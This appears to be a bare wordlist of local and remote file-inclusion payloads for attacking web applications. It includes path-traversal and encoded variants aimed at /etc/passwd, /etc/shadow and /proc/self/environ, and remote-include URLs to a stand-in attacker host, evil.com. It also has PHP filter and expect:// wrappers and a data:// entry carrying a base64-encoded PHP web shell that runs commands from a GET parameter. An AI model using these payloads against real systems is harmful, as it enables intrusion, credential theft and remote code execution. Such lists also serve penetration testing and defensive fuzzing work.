etc/passwd
etc/passwd%00
../../etc/passwd
%252e%252e%252f
....//....//etc/passwd
/etc/issue
/etc/passwd
/etc/shadow
/etc/group
/etc/hosts
/etc/motd
/etc/mysql/my.cnf
/proc/[0-9]*/fd/[0-9]*
/proc/self/environ
/proc/version
/proc/cmdlin
http://evil.com/shell.txt
http://evil.com/shell.txt%00
http:%252f%252fevil.com%252fshell.txt
php://filter/read=string.rot13/resource=index.php
php://filter/convert.base64-encode/resource=index.php
pHp://FilTer/convert.base64-encode/resource=index.php
php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=
php:expect://id
php:expect://ls
data:application/x-httpd-php;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoMSk+
